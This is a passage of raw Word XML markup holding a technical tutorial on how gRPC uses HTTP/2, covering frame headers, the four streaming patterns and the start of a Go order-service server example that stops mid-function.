        <w:t xml:space="preserve">  - No server push.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C92CC90" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Need multiple TCP connections for parallelism (6 per origin in browsers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BE82A8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="35A758C6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>HTTP/2 advantages (all used by gRPC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7005736D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Multiplexing: Many requests/responses on ONE TCP connection (streams).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2A1216" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Binary framing: Compact, efficient parsing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1504A8A4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Header compression (HPACK): Headers compressed, deduplicated across requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC65C77" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Server push: Server sends data without client requesting it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD6269C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Stream prioritization: Important requests processed first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1493FF5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Flow control: Per-stream and connection-level flow control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB8AB0B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How gRPC uses HTTP/2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23867C12" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7952856B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Each gRPC call = one HTTP/2 stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD553A1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Multiple concurrent gRPC calls = multiple streams on one TCP connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF627C6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>No head-of-line blocking at the application level (streams are independent).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D609A25" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="1E062E4C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>gRPC request (HTTP/2 frame):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2ADD91" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  :method: POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D82FA35" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  :path: /ecommerce.OrderService/CreateOrder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5D13F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  :authority: order-service:50051</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F91974" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  content-type: application/grpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1652607E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  grpc-encoding: gzip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714C8415" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  [binary protobuf payload]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F741051" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="42A2C27A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>gRPC response (HTTP/2 frames):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790B8DFF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  :status: 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B535B02" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  content-type: application/grpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D740CE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  [binary protobuf payload]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DDF9F2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  grpc-status: 0 (OK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CAB453" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  grpc-message: (empty)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10748DED" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.4 gRPC Communication Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6275724C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Unary RPC (simple request-response):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAEA619" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D26FAC8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>rpc GetUser(GetUserRequest) returns (User);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6F7B22" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED3B531" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ──── Request ────→ Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADB2418" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>Client ←─── Response ────Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640479F8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="1AC8035A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Same as REST: one request, one response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06354886" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Server streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452BF254" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FC5C74" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>rpc ListOrders(ListOrdersRequest) returns (stream Order);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0973A31D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34454243" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ──── Request ──────────→ Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600BDD0E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ←─── Order 1 ─────────  Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422C3E53" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ←─── Order 2 ─────────  Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365FC0A2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ←─── Order 3 ─────────  Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126DCF76" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ←─── ... ──────────────  Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BC95B8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ←─── (stream end) ────  Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C881FE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="112FD86D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Use case: Large result sets, real-time updates, file download.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738E777B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Client streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8A9821" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFAF9F0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>rpc UploadFile(stream FileChunk) returns (UploadStatus);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D533EC3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9B78C2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ──── Chunk 1 ──────────→ Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607493F9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ──── Chunk 2 ──────────→ Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735DAE11" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ──── Chunk 3 ──────────→ Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEBB09E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ──── (stream end) ─────→ Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE393B6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ←─── Response ─────────  Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A67FC3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="32804318" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Use case: File upload, batch writes, IoT sensor data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9AAEE1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. Bidirectional streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3233F2AA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF1203A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>rpc Chat(stream ChatMessage) returns (stream ChatMessage);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766E1AF2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790CB9DC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ──── Message ─────→ Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7843282D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ←─── Message ─────  Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43693EE8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ──── Message ─────→ Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379F2E29" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ──── Message ─────→ Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BAB99A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ←─── Message ─────  Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466F3990" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client ←─── Message ─────  Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34002374" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045CE054" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="7A16990E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Both sides send independently (full duplex).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFAA42C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Use case: Chat, real-time collaboration, gaming, live data feeds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D791003" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 gRPC Implementation Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08682FBD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server (Go):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFC27AD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278ACC4D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CC5F25" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="456AD89F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F051EDC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "context"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727DA241" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "net"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C68AA1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "google.golang.org/grpc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C1156F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    pb "myapp/proto/ecommerce"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31602016" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBBC0E3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="70E39695" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>type orderServer struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6614D554" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    pb.UnimplementedOrderServiceServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4848D374" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    orders map[string]*pb.Order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE4DE1C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6329B143" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="5182300E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>func (s *orderServer) GetOrder(ctx context.Context, req *pb.GetOrderRequest) (*pb.Order, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7A6554" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    order, ok := s.orders[req.OrderId]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148DEBA2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    if !ok {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23956E76" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        return nil, status.Errorf(codes.NotFound, "order %s not found", req.OrderId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BB58B8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4758FE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    return order, nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682DF36B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E04655" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="47F70B63" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>func (s *orderServer) StreamOrderUpdates(req *pb.StreamRequest, stream pb.OrderService_StreamOrderUpdatesServer) error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7CAD01" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Server streaming: push updates to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2905E99D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    for update := range orderUpdateChannel {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DFF563" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        if err := stream.Send(update); err != nil {</w:t>
      </w:r>
    </w:p>
